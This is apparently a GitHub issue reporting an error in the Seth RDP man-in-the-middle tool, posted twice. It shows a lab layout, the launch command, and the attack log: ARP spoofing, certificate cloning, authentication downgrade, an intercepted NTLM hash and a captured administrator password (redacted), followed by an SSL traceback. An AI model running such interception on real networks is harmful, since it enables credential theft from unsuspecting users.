You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Scenario Lab:
- Victim - Windows 11 23H2 - VICTIM_IP
Attacking-PC - Kali Linux - ATTACKER_IP
- Target - DC01 - Windows Server 2019 - TARGET_IP
Gateway -GATEWAY_IP
When I ran the following command '$ ./seth.sh INTERFACE ATTACKER_IP VICTIM_IP GATEWAY_IP> TARGET_IP' I got the following error:
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Linux OS detected, using iptables as the netfilter interpreter
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is TARGET_IP
[] Clone the x509 certificate of the original destination...
[] Adjust iptables rules for all packets...
[] Run RDP proxy...
Listening for new connection
Connection received from VICTIM_IP:55727
Warning: RC4 not available on client, attack might not work
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
administrator::rdp:NTML hash
Tamper with NTLM response
Downgrading CredSSP
Connection received from VICTIM_IP:55728
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL Connection lost on enableSSL: [Errno 104] Connection reset by peer
Hiding forged protocol request from client
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
self.run()
File "/home/kali/Documents/Seth-master/seth/main.py", line 49, in run
self.run_fake_server()
File "/home/kali/Documents/Seth-master/seth/main.py", line 79, in run_fake_server
self.lsock.send(resp)
File "/usr/lib/python3.11/ssl.py", line 1242, in send
return self._sslobj.write(data)
^^^^^^^^^^^^^^^^^^^^^^^^
ssl.SSLEOFError: EOF occurred in violation of protocol (_ssl.c:2427)
Connection received from VICTIM_IP:55731
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
'NoneType' object has no attribute 'getsockopt'
Hiding forged protocol request from client
rdp\administrator:<shows_password>
[] Cleaning up...
[] Done
Can you check this?
This tool is pure to verify RDP security settings on my own network.
Also Server does not enforces NLA
The text was updated successfully, but these errors were encountered:
Scenario Lab:
- Victim - Windows 11 23H2 - VICTIM_IP
- Target - DC01 - Windows Server 2019 - TARGET_IP
When I ran the following command '$ ./seth.sh INTERFACE ATTACKER_IP VICTIM_IP GATEWAY_IP> TARGET_IP' I got the following error:
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Linux OS detected, using iptables as the netfilter interpreter
[] Spoofing arp replies...
[] Turning on IP forwarding...
[] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is TARGET_IP
[] Clone the x509 certificate of the original destination...
[] Adjust iptables rules for all packets...
[] Run RDP proxy...
Listening for new connection
Connection received from VICTIM_IP:55727
Warning: RC4 not available on client, attack might not work
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
administrator::rdp:NTML hash
Tamper with NTLM response
Downgrading CredSSP
Connection received from VICTIM_IP:55728
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Connection lost on enableSSL: [Errno 104] Connection reset by peer
Hiding forged protocol request from client
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
self.run()
File "/home/kali/Documents/Seth-master/seth/main.py", line 49, in run
self.run_fake_server()
File "/home/kali/Documents/Seth-master/seth/main.py", line 79, in run_fake_server
self.lsock.send(resp)
File "/usr/lib/python3.11/ssl.py", line 1242, in send
return self._sslobj.write(data)
^^^^^^^^^^^^^^^^^^^^^^^^
ssl.SSLEOFError: EOF occurred in violation of protocol (_ssl.c:2427)
Connection received from VICTIM_IP:55731
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
'NoneType' object has no attribute 'getsockopt'
Hiding forged protocol request from client
rdp\administrator:<shows_password>
[] Cleaning up...
[] Done
Can you check this?
This tool is pure to verify RDP security settings on my own network.
Also Server does not enforces NLA
The text was updated successfully, but these errors were encountered: